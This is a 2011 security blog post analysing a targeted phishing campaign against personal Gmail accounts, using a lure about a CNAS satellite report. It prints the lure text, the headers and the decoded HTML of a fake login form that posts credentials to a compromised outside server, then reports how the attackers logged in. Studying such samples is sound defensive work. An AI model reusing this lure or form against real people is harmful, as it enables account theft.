Thursday, August 11, 2011

Targeted attacks against personal Gmail accounts Part II - CNAS Report


popartmachine.com
I am posting this only to highlight the fact that once compromises happen and are covered in the news, they do not disappear and attackers don't give up or stop. They continue their business as usual. Here is a small update to the post dated Feb 17, 2011 Targeted attacks against personal accounts of military, government employees and associates. This post was mentioned a few times in the news thanks to Google mention in their blogpost in June 2011 


I received a phishing email sample indicating that the attackers described in the above post continue their efforts with a very slight modifications to the original themes and I must note that this incident is even more simple than the previous one. I don't know if any accounts were compromised this time, I hope the public disclosure of the previous attacks along with the notifications on Forward rules and two-factor authentication in Gmail helped prevent most if not all compromises.

P.S. Google are aware of this, there is not much they can do to prevent these from coming in but I am sure they are trying. If you are concerned about your account safety, please use two-factor authentication and change your passwords often.

General threat information

Type

Login form in html message offering to "activate" a subscription to CNAS publications, using this actual publicatin reference as a lure: CNAS Report Calls Declining Satellite Capabilities National Security Concern.

Distribution and targets:
Email link, targeted phishing message sent to Gmail account of a person associated with political and international affairs (in this case). Links are customized and individualized for each target. The sender is a spoof address of a very close associate.

See another example of password theft attempts posted by Lotta here
August 10 - Details of First Chinese Aircraft Carrier Revealed

Attack approach:
Victims get a message from an address of a close associate or a collaborating organization/agency, which is spoofed. The message is crafted to look like a subscription form offering to enter Gmail credentials to activate it. Considering that a lot of services use Google login for authentication, it is not supposed to alarm the recipient. As soon as credentials are entered, the following happens

= Credentials get posted / sent to a server in Houston, TX
= Recipient gets redirected back to Gmail, already logged in so will end  up back in the inbox
= Attackers login to the compromised account within a few hours and then at least twice daily to check and read mail.

Note: no forwarding rules were set up by attackers for the duration of the testing.

Original message

---------- Forwarded message ----------
From: XXXXXXXXX
Date: Tue, Aug 2, 2011 at 7:55 AM
Subject: CNAS Report Calls Declining Satellite Capabilities National Security Concern
To: XXXXXXXXXXXXXXXX@gmail.com


Your account will be locked for unusual account activity, which includes, but is not limited to:
1.    Receiving, deleting, or downloading large amounts of mail via POP or IMAP in a short period of time.
2.    Sending a large number of undeliverable messages (messages that bounce back).
3.    Using file-sharing or file-storage software, browser extensions, or third party software that automatically logs in to your account.
4.    Leaving multiple instances of Gmail open.Browser-related issues. Please note that if you find your browser continually reloading while attempting to access your Inbox, it's probably a browser issue, and it may be necessary to clear your browser's cache and cookies.
Please log in the Gmail Server to activate your account:

Headers and sender

The HTML code of the email is Base64 encoded and upon decoding presents the form above with the login information of the recipient already hardcoded in it

Partial headers and email "original" view:
........................
Received: from omh-ma01.r1000.mx.aol.com (omh-ma01.r1000.mx.aol.com [172.29.41.7])
    by mtaout-da03.r1000.mx.aol.com (MUA/Third Party Client Interface) with ESMTP id 663DEE0000F1
    for XXXXXXXX@gmail.com>; Tue,  2 Aug 2011 08:03:11 -0400 (EDT)
Received: from mtaout-ma02.r1000.mx.aol.com (mtaout-ma02.r1000.mx.aol.com [172.29.41.2])
    by omh-ma01.r1000.mx.aol.com (AOL Outbound Holding Interface) with ESMTP id 5CDF8E000086
    for XXXXXXXX@gmail.com>; Tue,  2 Aug 2011 08:03:11 -0400 (EDT)
Received: from web-server (unknown [122.146.219.130])
    by mtaout-ma02.r1000.mx.aol.com (MUA/Third Party Client Interface) with SMTP id 40157E000F42
    for XXXXXXXX@gmail.com>; Tue,  2 Aug 2011 08:03:07 -0400 (EDT)
Date: Tue, 02 Aug 2011 19:55:19 +0800
From: XXXXXXXXXXXXX
To: XXXXXXXXXX
Subject: CNAS Report Calls Declining Satellite Capabilities National Security Concern
X-Mailer: Foxmail 6, 10, 201, 20  - Commonly used in Chinese made phishing attacks
Mime-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: base64
X-AOL-SCOLL-SCORE: 1:2:254689392:93952408 
X-AOL-SCOLL-URL_COUNT: 2 
X-AOL-IP: 122.146.219.130  -Taiwan
x-aol-global-disposition: G
X-AOL-SCOLL-SCORE: 1:2:278191424:93952408 
X-AOL-SCOLL-URL_COUNT: 2 
x-aol-sid: 3039ac1d33834e37e77f14f3

PGI+WW91ciBhY2NvdW50IHdpbGwgYmUgbG9ja2VkIGZvciB1bnVzdWFsIGFjY291bnQgYWN0
aXZpdHksIHdoaWNoIGluY2x1ZGVzLCBidXQgaXMgbm90IGxpbWl0ZWQgdG86PGJyPg0KPG9s
Pg0KPGxpPlJlY2VpdmluZywgZGVsZXRpbmcsIG9yIGRvd25sb2FkaW5nIGxhcmdlIGFtb3Vu
dHMgb2YgbWFpbCB2aWEgUE9QIG9yIElNQVAgaW4gYSBzaG9ydCBwZXJpb2Qgb2YgdGltZS48
L2xpPg0KPGxpPlNlbmRpbmcgYSBsYXJnZSBudW1iZXIgb2YgdW5kZWxpdmVyYWJsZSBtZXNz
YWdlcyAobWVzc2FnZXMgdGhhdCBib3VuY2UgYmFjaykuPC9saT4NCjxsaT5Vc2luZyBmaWxl
LXNoYXJpbmcgb3IgZmlsZS1zdG9yYWdlIHNvZnR3YXJlLCBicm93c2VyIGV4dGVuc2lvbnMs
IG9yIHRoaXJkIHBhcnR5IHNvZnR3YXJlIHRoYXQgYXV0b21hdGljYWxseSBsb2dzIGluIHRv
IHlvdXIgYWNjb3VudC48L2xpPg0KPGxpPkxlYXZpbmcgbXVsdGlwbGUgaW5zdGFuY2VzIG9m
IEdtYWlsIG9wZW4uQnJvd3Nlci1yZWxhdGVkIGlzc3Vlcy4gUGxlYXNlIG5vdGUgdGhhdCBp
ZiB5b3UgZmluZCB5b3VyIGJyb3dzZXIgY29udGludWFsbHkgcmVsb2FkaW5nIHdoaWxlIGF0
etc. etc.
.............

Sender IP 

122.146.219.130   - was used for malicious mailings of all kinds more than once before

122.146.219.130
122-146-219-130.static.sparqnet.net
Host reachable, 249 ms. average

122.146.219.128 - 122.146.219.143
Meiqiu,Huang
Kaohsiung Taiwan
Taiwan
Sam Chen
Meiqiu,Huang
Kaohsiung Taiwan
stevechen6@hotmail.com

--------------------------------------

Credential harvest

 Decoded form html code - the recipient address is changed to xxxxxxx@gmail.com and all < and > were replaced with { and }.

*Your account will be locked for unusual account activity, which includes,
but is not limited to:

   1. Receiving, deleting, or downloading large amounts of mail via POP or
   IMAP in a short period of time.
   2. Sending a large number of undeliverable messages (messages that bounce
   back).
   3. Using file-sharing or file-storage software, browser extensions, or
   third party software that automatically logs in to your account.
   4. Leaving multiple instances of Gmail open.Browser-related issues.
   Please note that if you find your browser continually reloading while
   attempting to access your Inbox, it's probably a browser issue, and it may
   be necessary to clear your browser's cache and cookies.

Please log in the Gmail Server to activate your account:
        account  Log in
Username:
        Password:        Save my information in this computer
  *

......... Subject: CNAS Report Calls Declining Satellite Capabilities National Securi=
ty Concern{br}To: {a href=3D"mailto:xxxxxxxxxxxx@gmail.com"}xxxxxx=
y@gmail.com{/a}{br}{br}{br}{b}Your account will be locked for unusual accou=
nt activity, which includes, but is not limited to:{br}


{ol}
{li}Receiving, deleting, or downloading large amounts of mail via POP or IM=
AP in a short period of time.{/li}
{li}Sending a large number of undeliverable messages (messages that bounce =
back).{/li}
{li}Using file-sharing or file-storage software, browser extensions, or thi=
rd party software that automatically logs in to your account.{/li}
{li}Leaving multiple instances of Gmail open.Browser-related issues. Please=
 note that if you find your browser continually reloading while attempting =
to access your Inbox, it's probably a browser issue, and it may be nece=
ssary to clear your browser's cache and cookies. {/li}


{/ol}
{p}Please log in the Gmail Server to activate your account:{/p}
{form name=3D"1318a6060f9f02b2_mygmail_loginform" action=3D"http://www.soft=
echglobal.com/account/activation.asp" method=3D"post" target=3D"_blank" ons=
ubmit=3D"alert("This form has been disabled."); return false"}{di=
v name=3D"gaia_loginbox"}


{table border=3D"0" cellpadding=3D"5" cellspacing=3D"3" width=3D"800"}=20
 {tbody}{tr}=20
{td style=3D"text-align:center" bgcolor=3D"#e8eefa" nowrap valign=3D"top"} =
=20
{input name=3D"ltmpl" value=3D"default" type=3D"hidden"}=20
{input name=3D"ltmplcache" value=3D"2" type=3D"hidden"}
  {div}
{table align=3D"center" border=3D"0" cellpadding=3D"1" cellspacing=3D"0"}=
=20
{tbody}{tr}
{td colspan=3D"2" align=3D"center"}=20
{table}
{tbody}{tr}
{td valign=3D"top"}=20
{b}{img}{/b}{/td}=20
 {td valign=3D"middle"} =20
{font size=3D"-0"}{b}account{/b}{/font}=20
{/td} =20
{/tr}
{/tbody}{/table}
{font size=3D"-1"}Log in{/font}
{/td}{/tr} =20
{tr} =20
{td colspan=3D"2" align=3D"center"}{/td}{/tr}
{tr}=20
{td nowrap} =20
{div align=3D"center"}{span}Username:{/span}{/div} =20
{/td}=20
{td}
{input name=3D"service" value=3D"mail" type=3D"hidden"} =20
{input name=3D"rm" value=3D"false" type=3D"hidden"}=20
{input name=3D"id" value=3D"22626" type=3D"hidden"}=20
{input name=3D"ltmpl" value=3D"default" type=3D"hidden"}=20
 {input name=3D"GALX" value=3D"NIE34iN5DYQ" type=3D"hidden"}=20
 {input name=3D"myEmail" size=3D"18" value=3D"xxxxxxxxxxxxxxx@gmail.com" typ=
e=3D"text"}{/td}
{/tr}=20
{tr}{td}{/td} =20
{td align=3D"left"} {/td}=20
{/tr}=20
{tr} =20
{td align=3D"center"}  =20
{span}Password:{/span}{/td}  =20
{td}  =20
{input name=3D"myPasswd" size=3D"18" value=3D"" type=3D"password"}{/td}=20
{/tr}=20
{tr} =20
{td}  =20
{/td}  =20
{td align=3D"left"}=20
{/td}=20
{/tr} =20
{tr} =20
{td align=3D"right" valign=3D"top"}=20
{input name=3D"PersistentCookie" value=3D"yes" type=3D"checkbox"}  =20
{input name=3D"rmShown" value=3D"1" type=3D"hidden"}  =20
{/td} =20
{td}{span}Save my information in this computer{/span}{/td}=20
{/tr}=20
{tr} =20
{td}=20
{/td} =20
{td align=3D"left"} =20
{input name=3D"signIn" value=3D"Activate" type=3D"submit"}=20
 {/td}=20
{/tr}=20
{tr}  =20
{td colspan=3D"2" align=3D"center" height=3D"33" valign=3D"bottom"}   =20
{/td}=20
{/tr} =20
 {/tbody}{/table}  =20
{/div} =20
 {/td}  =20
{/tr}=20
{/tbody}{/table}=20
{/div}{/form}{/b}=20

{/div}{br}{/div}

--0022154018566f409004a9c738bd--

 Some parts of interest:

Please log in the Gmail Server to activate your account:{/p>
form name=3D"1318a6060f9f02b2_mygmail_loginform" action=3D"http://www.soft=
echglobal.com/account/activation.asp
" method=3D"post" target=3D"_blank" ons=
ubmit=3D"alert("This form has been disabled."); return false">{di=
v name=3D"gaia_loginbox">
--------------------------------
input name=3D"GALX" value=3D"NIE34iN5DYQ" type=3D"hidden">=20
 input name=3D"myEmail" size=3D"18" value=3D"xxxxxxxxxxxxxxx@gmail.com" typ=
e=3D"text">{/td>
As you see the form results get posted to softechglobal.com/account/activation.asp and they are marked with the ID or sorts GALX" value=3D"NIE34iN5DYQ

Softech global Ltd
      Softech global Ltd
      Softech House London Road
      Albourne,  BN6 9BN
      GB
      Phone: +44.1111111111
      Email:

   Registrar Name....: Register.com
   Registrar Whois...: whois.register.com
   Registrar Homepage: www.register.com

   Domain Name: softechglobal.com
      Created on..............: 2011-04-19
      Expires on..............: 2012-08-31

   Administrative Contact:
      Nildram
      Nildram Hostmaster
      1 Triangle Business Park NULL
      Stoke Mandeville,  HP22 5BL
      GB
      Phone: +44.8002982981
      Email:

Credential compromise testing

In order to test the exploit, I made an account closely resembling the recipient account and filled it with Google alerts about human rights and various military issues, random malicious documents, and mail from China related Google groups. The result is not very interesting for a spy but more or less plausible.


I changed the hardcorded gmail ID of the target in the HTML code and entered the new account credential information in the resulting "activate" form

The resulting traffic is as follows

www.softechglobal.com   70.86.21.146 appears to be a legitimate company with the website hosted in ThePlanet.com Internet Services and that server is compromised
 70.86.21.146
92.15.5646.static.theplanet.com
Host reachable, 48 ms. average
70.84.0.0 - 70.87.255.255
ThePlanet.com Internet Services, Inc.
315 Capitol
Suite 205
Houston
TX
77002
United States


-----------------------------------------------------------
www.softechglobal.com Hosting history

Event Date Action Pre-Action IP Post-Action IP
2005-03-05 New -none- 62.3.208.46
2007-05-27 Change 62.3.208.46 62.3.237.98
2008-06-15 Change 62.3.237.98 70.86.21.146
2011-04-10 New -none- 70.86.21.146



70.86.21.146

More information

It is blacklisted in twelve lists.  --- someone needs to clean it up there


Post compromise activity

The password thieves did not delay and logged in less than two hours after the compromise.


All logins come from Tor exit nodes and what could be Tor or maybe a compromised server (vps18345.ovh.net)

For example
Aug 7, 2011
Browser  United States (74.120.13.132)  8:44 pm   Tor, Germany

Aug8, 2011
Browser     United States (CA) (184.154.116.155
SingleHop, Inc.
621 W. Randolph St.
3rd Floor
Chicago
IL
60661
United States

Aug 12
Browser France (46.105.27.26)
vps18345.ovh.net
Host reachable, 112 ms. average, 2 of 4 pings lost
46.105.27.0 - 46.105.27.255
OVH Ltd
VPS
http://www.ovh.co.uk
United Kingdom
Octave Klaba
OVH SAS
2 rue Kellermann
59100 Roubaix
France
phone: +33 9 74 53 13 23
noc@ovh.net

1 comment:

  1. The other thing to look for is a forward set up on your account to another email. At least with human rights activists this was a common tactic so the attackers didn't need to log back into compromised accounts.

    ReplyDelete